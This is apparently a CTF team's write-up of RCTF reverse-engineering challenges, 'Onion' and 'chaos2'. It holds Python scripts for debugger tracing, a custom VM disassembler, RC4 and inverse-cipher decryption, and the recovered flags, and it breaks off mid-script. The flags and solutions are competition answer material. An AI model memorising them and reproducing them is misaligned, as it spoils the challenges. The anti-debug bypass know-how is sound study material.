Rank 8

8989ae474ea2bc509f4b74895bffe36f

师傅们太强了!!!!冲冲冲!!!

Reverse

Onion

自制调试框架打trace log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
from tgdbg import*

s = -0x0000000000000280
is_print = False

def hook_inc(dbg: Debugger):
global is_print
rsp = dbg.reg_read(REG_RSP)
rdi = dbg.reg_read(REG_RDI)
num = dbg.mem_read_qword(rsp + rdi*8 + 0x328 + s)

if(is_print):
print(f"0x{num:x} + 1 = 0x{num + 1:x}")

def hook_dec(dbg: Debugger):
global is_print
rsp = dbg.reg_read(REG_RSP)
rdi = dbg.reg_read(REG_RDI)
num = dbg.mem_read_qword(rsp + rdi*8 + 0x328 + s)
if(is_print):
print(f"0x{num:x} - 1 = 0x{num - 1:x}")

def hook_shr(dbg: Debugger):
global is_print
rax = dbg.reg_read(REG_RAX)
cl = dbg.reg_read(REG_CL)
if(is_print):
print(f"0x{rax:x} >> {cl} = 0x{rax >> cl:x}")

def hook_add(dbg: Debugger):
global is_print
rsp = dbg.reg_read(REG_RSP)
word1 = dbg.mem_read_word(rsp + 0x328 - 0x3C)
ax = dbg.reg_read(REG_AX)
if(is_print):
print(f"0x{word1:x} + 0x{ax} = 0x{word1 + ax:x}")

def hook_and(dbg: Debugger):
global is_print
rsp = dbg.reg_read(REG_RSP)
rcx = dbg.reg_read(REG_RCX)
qword1 = dbg.mem_read_qword(rsp + rcx*8 + 0x328 + s)
rax = dbg.reg_read(REG_RAX)
if(is_print):
print(f"0x{qword1:x} & 0x{rax:x} = 0x{qword1 & rax:x}")

def hook_xor1(dbg: Debugger):
global is_print
rsi = dbg.reg_read(REG_RSI)
rax = dbg.reg_read(REG_RAX)
if(is_print):
print(f"0x{rsi:x} ^ 0x{rax:x} = 0x{rsi ^ rax:x}")

def hook_shl(dbg: Debugger):
global is_print
rax = dbg.reg_read(REG_RAX)
cl = dbg.reg_read(REG_CL)
if(is_print):
print(f"0x{rax:x} << {cl} = 0x{(rax << cl)&0xFFFFFFFFFFFFFFFF:x}")

def hook_xor2(dbg: Debugger):
global is_print
rdx = dbg.reg_read(REG_RDX)
rax = dbg.reg_read(REG_RAX)
if(is_print):
print(f"0x{rdx:x} ^ 0x{rax:x} = 0x{rdx ^ rax:x}")

def hook_and2(dbg: Debugger):
global is_print
rsp = dbg.reg_read(REG_RSP)
rdi = dbg.reg_read(REG_RDI)
qword1 = dbg.mem_read_qword(rsp + rdi*8 + 0x328 + s)
rax = dbg.reg_read(REG_RAX)
if(is_print):
print(f"0x{qword1:x} & 0x{rax:x} = 0x{qword1 & rax:x}")

def hook_cmp1(dbg: Debugger):
global is_print
rsp = dbg.reg_read(REG_RSP)
rdi = dbg.reg_read(REG_RDI)
rax = dbg.reg_read(REG_RAX)

#if(rax == 0x659391a5dc3522b3):
#if(rax == 0x5538224d4c7a252a):
if(rax == 0x9766ec5e9e3303c0):
dbg.hook_add(dbg.base_addr + 0x17CA0, hook_inc)
dbg.hook_add(dbg.base_addr + 0x17CD1, hook_dec)
dbg.hook_add(dbg.base_addr + 0x17E48, hook_shr)
dbg.hook_add(dbg.base_addr + 0x17DA7, hook_add)
dbg.hook_add(dbg.base_addr + 0x1778E, hook_and)
dbg.hook_add(dbg.base_addr + 0x17A5E, hook_xor1)
dbg.hook_add(dbg.base_addr + 0x17EE0, hook_shl)
dbg.hook_add(dbg.base_addr + 0x177E6, hook_xor2)
dbg.hook_add(dbg.base_addr + 0x179FF, hook_and2)
#if(rax == 0x659391a5dc3522b3):
#dbg.mem_write_qword(rsp + rdi*8 + 0x328 + s, 0xda19ba6b81c83f61)
is_print = True
qword1 = dbg.mem_read_qword(rsp + rdi*8 + 0x328 + s)
if(is_print):
print(f"0x{qword1:x} == 0x{rax:x}")

def enc():
dbg = Debugger("onion2", "")
# dbg.hook_add(dbg.base_addr + 0x17CA0, hook_inc)
# dbg.hook_add(dbg.base_addr + 0x17CD1, hook_dec)
# dbg.hook_add(dbg.base_addr + 0x17E48, hook_shr)
# dbg.hook_add(dbg.base_addr + 0x17DA7, hook_add)
# dbg.hook_add(dbg.base_addr + 0x1778E, hook_and)
# dbg.hook_add(dbg.base_addr + 0x17A5E, hook_xor1)
# dbg.hook_add(dbg.base_addr + 0x17EE0, hook_shl)
# dbg.hook_add(dbg.base_addr + 0x177E6, hook_xor2)
# dbg.hook_add(dbg.base_addr + 0x179FF, hook_and2)
dbg.hook_add(dbg.base_addr + 0x17839, hook_cmp1)
#dbg.hook_add(dbg.base_addr + 0x17839, hook_cmp2)
dbg.start_debugger()
dbg.close_debugger()

import sys

# 重定向print输出到文件

if __name__ == "__main__":
sys.stdout = open('output.txt', 'w')
enc()

这边发现在经过一次自定义加密,正确后会进行rc4解密出下一轮的vm字节码,以此类推

用反汇编框架提取每一轮的特征值并返回

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
#!/usr/bin/env python3
"""
Virtual Machine Disassembler
根据逆向分析的VM指令集编写
"""

import struct
import sys

def count_zero_bytes_to_bytes(n: int) -> int:
if not isinstance(n, int) or n < 0:
raise ValueError("输入必须是一个非负整数")

# 将整数转换为8字节的字节串,'big'表示大端序(不影响计数)
byte_representation = n.to_bytes(8, byteorder='big')

# bytes 对象有一个 count() 方法,可以直接统计子序列出现的次数
# b'\x00' 代表值为0的字节
return byte_representation.count(b'\x00')

def is_core_data(n):
count = count_zero_bytes_to_bytes(n)
if(count <= 2):
return True
return False

class VMDisassembler:
def __init__(self, bytecode):
self.bytecode = bytecode
self.pc = 0
self.instructions = []
self.core_data = []
self.cipher_off = []
self.next_vmcode_off = []

def read_byte(self):
"""读取一个字节"""
if self.pc >= len(self.bytecode):
return None
val = self.bytecode[self.pc]
self.pc += 1
return val

def read_word(self):
"""读取一个16位字(小端序)"""
if self.pc + 1 >= len(self.bytecode):
return None
val = struct.unpack('<H', self.bytecode[self.pc:self.pc+2])[0]
self.pc += 2
return val

def read_word_by_off(self, off):
"""读取一个16位字(小端序)"""
if self.pc + off >= len(self.bytecode):
return None
val = struct.unpack('<H', self.bytecode[self.pc + off:self.pc+off+2])[0]
return val

def read_qword(self):
"""读取一个64位字(小端序)"""
if self.pc + 7 >= len(self.bytecode):
return None
val = struct.unpack('<Q', self.bytecode[self.pc:self.pc+8])[0]
self.pc += 8
return val

def disassemble(self):
"""反汇编整个字节码"""
while self.pc < len(self.bytecode):
addr = self.pc
opcode = self.read_byte()

if opcode is None:
break

instr = self.decode_instruction(opcode, addr)
if(instr[1] == "STOP"):
break
if instr:
self.instructions.append(instr)
else:
break

return self.instructions

def decode_instruction(self, opcode, addr):
"""解码单条指令"""

# 0x00: NOP
if opcode == 0x00:
return (addr, "NOP", [])

# 0x01: LOAD_NEXT
elif opcode == 0x01:
val = self.read_word()
return (addr, "LOAD_NEXT", [f"0x{val:04X}"])

# 0x02: JZ (条件跳转 - 如果零标志)
elif opcode == 0x02:
target = self.read_word()
return (addr, "JZ", [f"0x{target:04X}"])

# 0x03: JNZ (条件跳转 - 如果非零)
elif opcode == 0x03:
target = self.read_word()
return (addr, "JNZ", [f"0x{target:04X}"])

# 0x11: SET_BASE1 (设置基址寄存器1)
elif opcode == 0x11:
val = self.read_word()
if(val == 0xE000):
pass
#print("CODE start")
return (addr, "SET_BASE1", [f"0x{val:04X}"])

# 0x12: SET_BASE2 (设置基址寄存器2)
elif opcode == 0x12:
val = self.read_word()
return (addr, "SET_BASE2", [f"0x{val:04X}"])

# 0x15: LOAD (从内存加载到寄存器)
elif opcode == 0x15:
reg = self.read_byte()
return (addr, "LOAD", [f"R{reg}", "[BASE1]"])

# 0x16: LOAD_IMM (立即数加载)
elif opcode == 0x16:
reg = self.read_byte()
imm = self.read_qword()
if(is_core_data(imm)):
#print(hex(imm))
self.core_data.append(
{'TYPE': 'LOAD', 'IMM': imm}
)
return (addr, "LOAD_IMM", [f"R{reg}", f"0x{imm:016X}"])

# 0x17: MOV (寄存器间传送)
elif opcode == 0x17:
dst = self.read_byte()
src = self.read_byte()
return (addr, "MOV", [f"R{dst}", f"R{src}"])

# 0x18: LOAD_OFF (带偏移加载)
elif opcode == 0x18:
reg = self.read_byte()
offset = self.read_word()
self.cipher_off = offset
return (addr, "LOAD_OFF", [f"R{reg}", f"[BASE1+{offset}]"])

# 0x19: STORE (存储寄存器到内存)
elif opcode == 0x19:
reg = self.read_byte()
return (addr, "STORE", [f"[BASE1]", f"R{reg}"])

# 0x1A: LOAD_IDX (索引加载)
elif opcode == 0x1A:
dst = self.read_byte()
src = self.read_byte()
return (addr, "LOAD_IDX", [f"R{dst}", f"[BASE1+R{src}]"])

# 0x1B: STORE_IDX (索引存储)
elif opcode == 0x1B:
src = self.read_byte()
idx = self.read_byte()
return (addr, "STORE_IDX", [f"[BASE1+R{idx}]", f"R{src}"])

# 0x1C: INC (自增)
elif opcode == 0x1C:
reg = self.read_byte()
return (addr, "INC", [f"R{reg}"])

# 0x1D: DEC (自减)
elif opcode == 0x1D:
reg = self.read_byte()
return (addr, "DEC", [f"R{reg}"])

# 0x1E: SHR (右移)
elif opcode == 0x1E:
reg = self.read_byte()
bits = self.read_byte()
return (addr, "SHR", [f"R{reg}", f"{bits}"])

# 0x1F: ADD_BASE (寄存器加到基址)
elif opcode == 0x1F:
reg = self.read_byte()
return (addr, "ADD_BASE", [f"BASE1", f"R{reg}"])

# 0x25: AND (逻辑与)
elif opcode == 0x25:
dst = self.read_byte()
src = self.read_byte()
return (addr, "AND", [f"R{dst}", f"R{src}"])

# 0x26: XOR (逻辑异或)
elif opcode == 0x26:
dst = self.read_byte()
src = self.read_byte()
return (addr, "XOR", [f"R{dst}", f"R{src}"])

# 0x27: SHL (左移)
elif opcode == 0x27:
reg = self.read_byte()
bits = self.read_byte()
return (addr, "SHL", [f"R{reg}", f"{bits}"])

# 0x29: XOR_IMM (立即数异或)
elif opcode == 0x29:
reg = self.read_byte()
imm = self.read_qword()
#print(hex(self.pc))
if(reg == None):
reg = 0
imm = 0
if(is_core_data(imm)):
#print(hex(imm))
self.core_data.append(
{'TYPE': 'XOR', 'IMM': imm}
)
return (addr, "XOR_IMM", [f"R{reg}", f"0x{imm:016X}"])

# 0x2A: AND_IMM (立即数与)
elif opcode == 0x2A:
reg = self.read_byte()
imm = self.read_qword()
return (addr, "AND_IMM", [f"R{reg}", f"0x{imm:016X}"])

# 0x2B: LOAD_IDX2 (使用BASE2索引加载)
elif opcode == 0x2B:
dst = self.read_byte()
src = self.read_byte()
return (addr, "LOAD_IDX2", [f"R{dst}", f"[BASE2+R{src}]"])

# 0x2C: STORE_IDX2 (使用BASE2索引存储)
elif opcode == 0x2C:
src = self.read_byte()
idx = self.read_byte()
return (addr, "STORE_IDX2", [f"[BASE2+R{idx}]", f"R{src}"])

# 0x32: CMP (比较)
elif opcode == 0x32:
reg = self.read_byte()
imm = self.read_qword()
if(is_core_data(imm)):
#print(hex(imm))
self.core_data.append(
{'TYPE': 'CMP', 'IMM': imm}
)
return (addr, "CMP", [f"R{reg}", f"0x{imm:016X}"])

# 0x80: SET_RET (设置返回地址)
elif opcode == 0x80:
return (addr, "SET_RET", [])

# 0x81: CALL (调用)
elif opcode == 0x81:
offset = self.read_byte()
return (addr, "CALL", [f"STACK[{offset}]"])

# 0x82: RET (返回)
elif opcode == 0x82:
offset = self.read_byte()
if(offset == 16):
#print(hex(self.pc))
self.next_vmcode_off = self.read_word_by_off(1)
#print(hex(self.next_vmcode_off))
return (addr, "STOP", [])
return (addr, "RET", [f"STACK[{offset}]"])

# 0x83: POP (弹栈)
elif opcode == 0x83:
return (addr, "POP", [])

# 0x84: PUSH (压栈)
elif opcode == 0x84:
reg = self.read_byte()
return (addr, "PUSH", [f"R{reg}"])

# 0x85: LOAD_STACK (从栈加载)
elif opcode == 0x85:
reg = self.read_byte()
return (addr, "LOAD_STACK", [f"R{reg}"])

# 0x90: PUTCHAR (输出字符)
elif opcode == 0x90:
char = self.read_byte()
if 32 <= char <= 126:
return (addr, "PUTCHAR", [f"'{chr(char)}'", f"(0x{char:02X})"])
else:
return (addr, "PUTCHAR", [f"0x{char:02X}"])

# 其他: HALT (停机)
else:
return (addr, "HALT", [f"(opcode=0x{opcode:02X})"])

def get_vm_data(self):
ADD = 0
SUB = 1
XOR = 2

print(self.cipher_off)
vm = {}
cases = []
for i in range(0, len(self.core_data) -3):
#print(data)
data = self.core_data[i]
#print(data['TYPE'], hex(data['IMM']))
if(data['IMM'] == 0xFFFFFFFFFFFFFFFF):
continue
#print(data['TYPE'], hex(data['IMM']))
if(data['TYPE'] == 'XOR'):
case = (XOR, data['IMM'])
if(data['TYPE'] == 'LOAD'):
next_data = self.core_data[i + 1]
if(next_data['IMM'] == 0xFFFFFFFFFFFFFFFF):
case = (SUB, data['IMM'])

else:
case = (ADD, data['IMM'])
cases.append(case)
vm['CASE'] = cases
vm['P1'] = self.core_data[-3]['IMM']
#print(hex(vm['P1']))
vm['P2'] = self.core_data[-2]['IMM']
vm['CIPHER'] = self.core_data[-1]['IMM']

#print(vm)
return vm

def print_disassembly(self):
"""打印反汇编结果"""
print("=" * 70)
print("VM Disassembly Output")
print("=" * 70)
print(f"{'Address':<10} {'Instruction':<15} {'Operands'}")
print("-" * 70)

for addr, mnemonic, operands in self.instructions:
ops_str = ", ".join(operands)
print(f"0x{addr:04X} {mnemonic:<15} {ops_str}")

print("=" * 70)
print(f"Total instructions: {len(self.instructions)}")

def main():
if len(sys.argv) < 2:
print("Usage: python disassembler.py <bytecode_file>")
print("Example: python disassembler.py vmcode.bin")
sys.exit(1)

filename = sys.argv[1]

try:
with open(filename, 'rb') as f:
bytecode = f.read()

print(f"[+] Loaded {len(bytecode)} bytes from {filename}")
#core_bytecode = bytecode[0x05A9:]
core_bytecode = bytecode
disasm = VMDisassembler(core_bytecode)
disasm.disassemble()
disasm.get_vm_data()

#disasm.print_disassembly()

# 可选:保存到文件
output_file = filename + ".asm"
with open(output_file, 'w') as f:
f.write("VM Disassembly\n")
f.write("=" * 70 + "\n\n")
for addr, mnemonic, operands in disasm.instructions:
ops_str = ", ".join(operands)
f.write(f"0x{addr:04X} {mnemonic:<15} {ops_str}\n")

print(f"\n[+] Disassembly saved to {output_file}")

except FileNotFoundError:
print(f"[-] Error: File '{filename}' not found")
sys.exit(1)
except Exception as e:
print(f"[-] Error: {e}")
sys.exit(1)

if __name__ == "__main__":
main()

rc4解密部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def rc4_ksa(key):
"""密钥调度算法 (KSA)

得到初始置换后的S表
"""
# 种子密钥key若为字符串,则转成字节串
if isinstance(key, str):
key = key.encode()
S = list(range(256)) # 初始化S表
# 利用K表,对S表进行置换
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i] # 置换
return S

def rc4_prga(S, text):
"""伪随机生成算法 (PRGA)

利用S产生伪随机字节流,
将伪随机字节流与明文或密文进行异或,完成加密或解密操作
"""
# 待处理文本text若为字符串,则转成字节串
if isinstance(text, str):
text = text.encode()
i = j = 0
result = []
count=0
for byte in text:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i] # 置换
t = (S[i] + S[j]) % 256
k = S[t] # 得到密钥字k
# 将明文或密文与k进行异或,得到处理结果
result.append(byte ^ k)
return bytes(result)

def rc4_encrypt(data, key):
S = rc4_ksa(key)
res = rc4_prga(S, data)
return res

解密算法的部分,用位运算代替了加减法,因此在tracelog里显得极其难看。

而其核心就是先进行一段自定义的,每一轮都不同的运算,后面再进入到一个统一的运算中,因为每一轮只需提取前一部分的特征值即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import struct

def p64(num):
packed_data = struct.pack('<Q', num)
return packed_data

M32 = 0xFFFFFFFF
M64 = 0xFFFFFFFFFFFFFFFF

def byte_rotate_mix_32(x):
"""字节旋转混合:实际是 ROR8"""
return ((x >> 8) ^ (x << 24)) & M32

def shift_mix_3_29(x):
"""移位混合:实际是 ROL3"""
return ((x << 3) ^ (x >> 29)) & M32

ADD = 0
SUB = 1
XOR = 2

def init_round(user_input, C):
"""初始化第0轮"""

P1, P2 = C['P1'], C['P2']

# 处理输入 -> hashed2
state = user_input

for case, num in C['CASE']:
if(case == SUB):
state = (state - num) & M64
if(case == ADD):
state = (state + num ) & M64
if(case == XOR):
state = (state ^ num) & M64


#print(case, num)

# 拆分并初始化状态
val1, val2 = state & M32, (state >> 32) & M32
val3, extra = P1 & M32, (P1 >> 32) & M32

# “第0轮”
result1 = ((byte_rotate_mix_32(val1) + val2) & M32) ^ val3
result2 = shift_mix_3_29(val2) ^ result1
temp3 = (byte_rotate_mix_32(extra) + val3) & M32
result3 = shift_mix_3_29(val3) ^ temp3

# 返回:result1, result2, result3, temp3, preset2_low, preset2_high
return result1, result2, result3, temp3, P2 & M32, (P2 >> 32) & M32

def round_func(val1, val2, val3, extra_val, round_counter):
"""加密中的通用轮函数"""
result1 = ((byte_rotate_mix_32(val1) + val2) & M32) ^ val3
result2 = shift_mix_3_29(val2) ^ result1
temp3 = ((byte_rotate_mix_32(extra_val) + val3) ^ round_counter) & M32
result3 = shift_mix_3_29(val3) ^ temp3
return result1, result2, result3, temp3

def encrypt(user_input, case):
"""加密函数(和你的一样,只是去掉 print)"""
val1, val2, val3, temp3, p2_low, p2_high = init_round(user_input, case)
temp3_history = [temp3]

# 27轮迭代(1 ~ 26)
for i in range(1, 27):
extra = p2_low if i == 1 else (p2_high if i == 2 else temp3_history[i - 3])
val1, val2, val3, temp3 = round_func(val1, val2, val3, extra, i)
temp3_history.append(temp3)

return (val2 << 32) | val1

# ===================== 下面是解密相关 =====================

def inv_shift_mix_3_29(y):
"""shift_mix_3_29 的逆:ROR3"""
return ((y >> 3) ^ (y << 29)) & M32

def inv_byte_rotate_mix_32(y):
"""byte_rotate_mix_32 的逆:ROL8"""
return ((y << 8) ^ (y >> 24)) & M32

def precompute_val3_schedule(case):
"""
预计算 val3 在每轮的取值。
注意:val3 的演化完全不依赖明文,只依赖常量和轮数,
所以这里随便给一个 user_input=0 即可。
"""
_, _, val3, temp3, p2_low, p2_high = init_round(0, case)

temp3_history = [temp3]
val3_list = [val3] # val3_list[i] = 第 i 轮开始时的 val3(i 从 0 开始)

for i in range(1, 27):
extra = p2_low if i == 1 else (p2_high if i == 2 else temp3_history[i - 3])
temp3 = ((byte_rotate_mix_32(extra) + val3) ^ i) & M32
val3 = shift_mix_3_29(val3) ^ temp3
temp3_history.append(temp3)
val3_list.append(val3)

# 长度 27: val3_list[0] 是 Round1 的 val3,val3_list[25] 是 Round26 的 val3,
# val3_list[26] 是第26轮后的 val3(用不到)
return val3_list

# 全局预计算一次

def decrypt(cipher, C):
"""
解密函数:给定 64bit 密文 -> 还原 64bit user_input
"""
VAL3_LIST = precompute_val3_schedule(C)
# 最后一轮的 val1, val2
val1 = cipher & M32
val2 = (cipher >> 32) & M32

# 逆向 26 ~ 1 轮
for i in range(26, 0, -1):
result1, result2 = val1, val2
v3_old = VAL3_LIST[i - 1] # 第 i 轮开始时使用的 val3

# 先反推 val2:
# result2 = ROL3(val2) ^ result1 => ROL3(val2) = result1 ^ result2
s2 = result1 ^ result2
val2_prev = inv_shift_mix_3_29(s2)

# 再反推 val1:
# result1 = (BR(val1) + val2_prev) ^ v3_old
# => BR(val1) = (result1 ^ v3_old) - val2_prev (mod 2^32)
br_val1_prev = ((result1 ^ v3_old) - val2_prev) & M32
val1_prev = inv_byte_rotate_mix_32(br_val1_prev)

val1, val2 = val1_prev, val2_prev

# 现在 (val1, val2) 就是 init_round 返回的 result1_0, result2_0
result1_0, result2_0 = val1, val2

# 继续逆 init_round 里那一轮
P1 = C['P1']
val3_init = P1 & M32 # init_round 里用的原始 val3 = P1 & 0xFFFFFFFF

s2 = result1_0 ^ result2_0
val2_init = inv_shift_mix_3_29(s2)
br_val1_init = ((result1_0 ^ val3_init) - val2_init) & M32
val1_init = inv_byte_rotate_mix_32(br_val1_init)

# 还原 hashed2
state = ((val2_init & M32) << 32) | (val1_init & M32)

#sprint(hex(state))
for case, num in reversed(C['CASE']):
# 条件判断逻辑保持不变,用来识别原始操作
if(case == SUB):
# 逆运算:将减法换成加法
state = (state + num) & M64
if(case == ADD):
# 逆运算:将加法换成减法
state = (state - num) & M64
if(case == XOR):
# 逆运算:异或的逆运算是其本身
state = (state ^ num) & M64

#print(hex(state))


return state

最后写一个统一的解密调度器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
from real_dec import*
from rc4_dec import*
from disvm import*

vm1 = {
'CIPHER': 0xda19ba6b81c83f61,
'CASE': [
(SUB, 0x48f0e6421ac66dea),
(XOR, 0x5074d85b9194e696),
(SUB, 0x5566488c9c5cf234),
(XOR, 0x8cb331163a92fc19),
],
'P1': 0x36b1cc9fe433713d,
'P2': 0xf97646d69c84ebd8
}

vm2 = {
'CIPHER': 0x659391a5dc3522b3,
'CASE': [
(XOR, 0x95714c91bc8b306f),
(XOR, 0x4303f92241dd9a9f),
(XOR, 0x311e18c91413b58c),
(SUB, 0x8df6073d0dbbff09),
(SUB, 0xee5744efe81e97b7),
(ADD, 0xf8a82a8dbdb78c3f),
(ADD, 0x58e8abfc7618f5fd),
(XOR, 0x99d88c4fa4cc68aa),
],
'P1': 0x8d85b3156df9f721,
'P2': 0x28e3d33340bc0884
}

def read_file(filename):
with open(filename,"rb") as file:
return file.read()

def write_file(filename, bytes):
with open(filename,"wb") as file:
return file.write(bytes)



def dec_file(bytes, off, key):
new_bytes = bytearray(bytes)
buffer = bytes[off:]
res = rc4_encrypt(buffer, key)
new_bytes[off:] = res
return new_bytes

def print_vm(vm):
print("cipher:", hex(vm['CIPHER']))

cases = vm['CASE']
for case in cases:
print(case[0], hex(case[1]))
print("P1:", hex(vm['P1']))
print("P2:", hex(vm['P2']))

# ===================== 简单自测 =====================
if __name__ == "__main__":
vmcode = read_file("full_vmcode")
disasm = VMDisassembler(vmcode)
disasm.disassemble()
#disasm.print_disassembly()
vm = disasm.get_vm_data()
next_vmcode_off = disasm.next_vmcode_off
print(hex(next_vmcode_off))
next_vmcode = vmcode
#print(_vm)
print_vm(vm)
for i in range(50):
dec = decrypt(vm['CIPHER'], vm)
key = p64(dec)
print(hex(dec), dec)
print()
#print(key)
next_vmcode = dec_file(next_vmcode, next_vmcode_off, key)
write_file(f"vmcode/{i}_vmcode", next_vmcode)

disasm = VMDisassembler(next_vmcode)
print(hex(next_vmcode_off))
disasm.pc = next_vmcode_off
disasm.disassemble()
vm = disasm.get_vm_data()
next_vmcode_off = disasm.next_vmcode_off

print_vm(vm)
# write_file("1_vmcode", dec_vmcode)

# disasm = VMDisassembler(dec_vmcode)
# disasm.disassemble()
# disasm.print_disassembly()

# output_file = "1.asm"
# with open(output_file, 'w') as f:
# f.write("VM Disassembly\n")
# f.write("=" * 70 + "\n\n")
# for addr, mnemonic, operands in disasm.instructions:
# ops_str = ", ".join(operands)
# f.write(f"0x{addr:04X} {mnemonic:<15} {ops_str}\n")

# print(f"\n[+] Disassembly saved to {output_file}")

将最后一轮的vmcode解出来

img

完整反汇编后最后就可以得到flag

img

RCTF{VM_ALU_SMC_RC4_SPECK!_593eb6079d2da6c187ed462b033fee34}

chaos

由于比赛平台分数榜计算问题,我们决定将Reverse方向【chaos】重新开放作为签到,并放出对应的Flag:RCTF{AntiDbg_KeyM0d_2025_R3v3rs3}

chaos2

四个反调试点,每个替换一个字节,不用过掉所有的反调试,最多只有2**4 * 2 * 2 中情况,直接遍历一遍,唯一需要关注的点是,密钥被强制填充为了128位,手动补全就行,花指令很好过。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
from pandas.core.missing import pad_or_backfill_inplace


def rc4(data, key):
"""
RC4加密/解密算法

参数:
data -- 要加密/解密的数据(字节类型)
key -- 加密/解密密钥(字节类型)

返回:
加密/解密后的数据(字节类型)

异常:
ValueError -- 如果密钥为空
"""
if not key:
raise ValueError("密钥不能为空")
KEY_LEN = 0x80
if len(key) < KEY_LEN:
# 如果密钥太短,用0填充
key = key.ljust(KEY_LEN, b'\0')
# 初始化S盒
s_box = [0]*256


# for ( i = 0; i < 0x100; ++i ) { *(_BYTE *)(i + a1) = i; }
for i in range(256):
s_box[i] = i

# 密钥调度算法(KSA) - 与伪代码对应
v5 = 0 # 密钥索引
v6 = 0 # 累加变量
for j in range(256):
# v4 = *(_BYTE *)(j + a1)
v4 = s_box[j]

# v6 = (unsigned __int8)(v6 + v4 + *(_BYTE *)(v5 + a2))
v6 = (v6 + v4 + key[v5%len(key)]) & 0xFF

# *(_BYTE *)(j + a1) = *(_BYTE *)((unsigned __int8)v6 + a1)
s_box[j] = s_box[v6]

# *(_BYTE *)(v6 + a1) = v4
s_box[v6] = v4

# if ( ++v5 >= a3 ) v5 = 0
v5 += 1
if v5 >= 0x80:
v5 = 0

# 伪随机生成算法(PRGA)
i = 0
j = 0
output = bytearray()
for byte in data:
i = (i + 1) & 0xFF
j = (j + s_box[i]) & 0xFF
# 交换S[i]和S[j]
s_box[i], s_box[j] = s_box[j], s_box[i]
# 生成密钥流
k = s_box[(s_box[i] + s_box[j]) & 0xFF]
output.append(byte ^ k)

return bytes(output)


from itertools import product

# 原始字符串
original = "flag:{ThisflaglsGo0ds}"

# 定义需要替换的位置和可能的字符
# 格式: (位置索引, [可选字符1, 可选字符2])
replacements = [
(8, ['i', '1']), # This中的i可以是i或1
(14, ['l', 'I']), # ls中的l可以是l或I
(17, ['o', '0']), # Go0d中的o可以是o或0
(18, ['0', 'o']) # Go0d中的0可以是0或o
]

# 生成所有可能的组合
all_combinations = product(*[options for _, options in replacements])

# 为每种组合生成结果并打印
keyarr=[]
print("所有可能的key组合:")
for i, combination in enumerate(all_combinations, 1):
# 将字符串转换为列表以便修改
s_list = list(original)

# 应用当前组合的替换
for j, (pos, _) in enumerate(replacements):
s_list[pos] = combination[j]

# 重新组合为字符串
result = ''.join(s_list)
keyarr.append(result)

# 打印结果
print(f"{i}. key4=b'{result}'")
print(keyarr)
print(f"\n总共生成 {i} 个可能的key")

# 使用示例
if __name__ == "__main__":
data = [0x0F, 0x1A, 0x8A, 0x5A, 0x22, 0xAB, 0x1E, 0x63, 0x19, 0x5A,
